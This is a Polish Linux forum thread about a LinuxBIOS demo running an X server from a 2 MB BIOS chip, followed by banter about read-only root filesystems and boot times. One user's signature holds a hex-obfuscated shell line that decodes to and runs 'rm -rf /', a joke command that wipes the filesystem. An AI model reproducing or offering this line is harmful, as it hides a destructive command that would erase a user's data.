Linux Bios + X server!!

Wszystko o czym chcecie dyskutować a tyczy się choć trochę Slackware Linux i nie tylko!

Moderatorzy: Moderatorzy, Administratorzy

miszmaniac
Moderator
Posty: 1510
Rejestracja: 2006-03-19, 12:00
Lokalizacja: Gdynia
Kontakt:

Linux Bios + X server!!

Post autor: miszmaniac »

Pewnie część z was już to widziała, bo dostałem to w newsletter z Linux.pl:
Alan Carvalho de Assis przesłał na listę dyskusyjną projektu LinuxBIOS informację o implementacji środowiska graficznego X11 na 2-megabajtowej pamięci BIOS! Na całość składa się LinuxBIOS, jądro Linuksa, BusyBox, miniserwer X11 - Kdrive, Matchbox jako menedżer okien i rxvt.
http://www.youtube.com/watch?v=nuzRsXKm_NQ

Osobiście jestem pod wielkim wrażeniem :ok:
kuba105
Użytkownik
Posty: 118
Rejestracja: 2006-01-09, 19:08

Re: Linux Bios + X server!!

Post autor: kuba105 »

A ja głupi myślałem że po tosterze z NetBSD nic mnie nie zadziwi ;-)
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Linux Bios + X server!!

Post autor: sayetan »

lol a ja z kolei myslałem, że tylko developerzy debiana próbują wcisnąć ich dystrybucje gdzie sie da.
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
kuba105
Użytkownik
Posty: 118
Rejestracja: 2006-01-09, 19:08

Re: Linux Bios + X server!!

Post autor: kuba105 »

Z tego co wiem to ostatnio bardziej są zajęci instalowaniem distro na jakimś kalkulatorze niż robieniem updatów. A później ludzie sie śmieją że Debian to muzeum wolnego oprogramowania :mrgreen:

[edit]
A wracając do tematu: niewątpliwie upchanie tego wszystkiego na 2MB to nie lada wyczyn, tylko po co to komu?
Ostatnio zmieniony 2007-03-18, 21:45 przez kuba105, łącznie zmieniany 1 raz.
Awatar użytkownika
Lashlo
Użytkownik
Posty: 108
Rejestracja: 2006-02-26, 12:13

Re: Linux Bios + X server!!

Post autor: Lashlo »

Fajne a system jest w trybie RO więc nie do zajechania.
To chyba powrót do Comodore.
didek666
Użytkownik
Posty: 49
Rejestracja: 2007-01-02, 22:11

Re: Linux Bios + X server!!

Post autor: didek666 »

Chłopaki, zrobimy Slacka do suszarki?
W sumie by się przydał,.
Za OpenSource!
Wspomóż [url=http://slackwiki.ovh.org]Polski Projekt Slackwiki[/url]!
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Linux Bios + X server!!

Post autor: BeteNoire »

Lashlo pisze:Fajne a system jest w trybie RO więc nie do zajechania.
To chyba powrót do Comodore.
Powrót?
A nie chciałbyś, żeby Ci się Linux bootował 5 sekund? Bo ja bym chciał. A niech sobie / i katalogi X+KDE będą tylko do odczytu. W systemie desktopowym do zapisu na codzień potrzebny jest tak naprawdę tylko /home oraz partycję z wolnymi danymi userów. Na serwerach dojdzie do tego jeszcze pewnie /var a /tmp można montować w tmpfs. No i jak sam powiedziałeś - / i /usr jest nie do zajechania.
Mi się pomysł podoba.
kuba105
Użytkownik
Posty: 118
Rejestracja: 2006-01-09, 19:08

Re: Linux Bios + X server!!

Post autor: kuba105 »

A czy na tych 2MB zmieści Ci się /usr, X, KDE? Wątpie. Żeby mieć system "nie do zajechania" wystarczy podmontować / w trybie RO i po sprawie, nie trzeba od razu upychać systemu do kości BIOSu.
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Linux Bios + X server!!

Post autor: BeteNoire »

Tak trudno wyobrazić sobie flash-bios o pojemności np 512 MB?
kuba105
Użytkownik
Posty: 118
Rejestracja: 2006-01-09, 19:08

Re: Linux Bios + X server!!

Post autor: kuba105 »

Nie, nie trudno. Ale nasuwa sie podobne pytanie co powyżej: po co ktokolwiek miałby produkować kości o pojemności 512MB(lub więcej) skoro kilka MB jest ilością wystarczającą żeby upchać tam BIOS? Tego elementu nie produkuje sie dla entuzjastów pragnących zainstalować tam Linuksa.
Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Linux Bios + X server!!

Post autor: Radek_R »

Tak szczerze mówiąc kość biosu ma pojemność 256kB czyli 2Mbit. Można też spotkać zapewne większe 512kB kości. Ale nie kilka MB. Co do systemu na kości Flash to istnieje takie cudo jak Fujitsu-Siemens FUTRO s300 i tam właśnie system jest umieszczony na karcie pamięci Flash.
Kolega miał coś takiego z (niestety) Windowsem, ale istnieje także wersja linuksa, zwie się eLux NG i można ją sobie tam wrzucić.
#358274
http://www.prook.net
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Linux Bios + X server!!

Post autor: BeteNoire »

Po to, żeby system uruchamiał się 5-10 sekund. Nie widzisz dla tego zastosowań? Cóż, nie chce mi się teraz fantazjować, więc pozostawiam to Tobie ;) Popuść wodze :D

Btw. wie ktoś jakie oprogramowanie steruje dekoderami najpopularniejszych platform cyfrowej TV SAT? Bo taki np. Nbox ma soft w Javie (logo przy uruchamianiu), z kolei sprzęt Polsatu uruchamia się kilka sekund tak jakby się... bootując. Zresztą, kiedy jeszcze była możliwość tzw. edukacji tunerów FTA, wgrywało się boota i właściwy soft... Orientuje się ktoś w tym temacie?
kuba105
Użytkownik
Posty: 118
Rejestracja: 2006-01-09, 19:08

Re: Linux Bios + X server!!

Post autor: kuba105 »

BeteNoire pisze:Po to, żeby system uruchamiał się 5-10 sekund.
To do tego musze stawiać system na kości biosu? Mniej więcej tyle czasu potrzebuje Arch żeby zachęcic mnie do logowania za pomocą KDMa ;-)

[edit]
Ja wogóle nie rozumiem tego pędu za jak najszybszym uruchamianem OSu, przecież kompa nie restartuje sie co 5 minut.
Ostatnio zmieniony 2007-03-19, 19:31 przez kuba105, łącznie zmieniany 1 raz.
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Linux Bios + X server!!

Post autor: BeteNoire »

Nie, ale pewnie na macierzy RAID zrobionej z dwóch WD Raptorów :]
No co Ty, w taki kit to ja Ci nie uwierzę (chyba, że bootcharta przedstawisz). Arch się uruchamia w 15 sekund ale do trybu konsoli, a KDM ładuje część KDE, więc to kolejne 5 sekund.
Ja wogóle nie rozumiem tego pędu za jak najszybszym uruchamianem OSu, przecież kompa nie restartuje sie co 5 minut.
Ja też nie, bo moje Gentoo uruchamia się do KDM 40 sekund (w laptopie! dysk 5400). Ale potrafię sobie wyobrazić sytuacje kiedy to może być bardzo męczące i kiedy restart może być konieczny. Do tego dochodzi swoista zadrość względem win-userów, którzy mają bezproblemową hibernację. Tymczasem suspend2 jeszcze kuleje...
Ostatnio zmieniony 2007-03-19, 19:41 przez BeteNoire, łącznie zmieniany 3 razy.
miszmaniac
Moderator
Posty: 1510
Rejestracja: 2006-03-19, 12:00
Lokalizacja: Gdynia
Kontakt:

Re: Linux Bios + X server!!

Post autor: miszmaniac »

Ogólnie to jest super rozwiązanie do programowych czytników multimediów... jeśli uruchomienie takiego sprzętu trwałoby 10 sek, to można by to przeżyć:)
Pamiętaj,
Jeśli Twój problem został rozwiązany dopisz [b] [Rozw.] [/b]w tytule.
Projektowanie stron WWW: [url=http://www.miszewski.net.pl]www.miszewski.net.pl[/url]
ODPOWIEDZ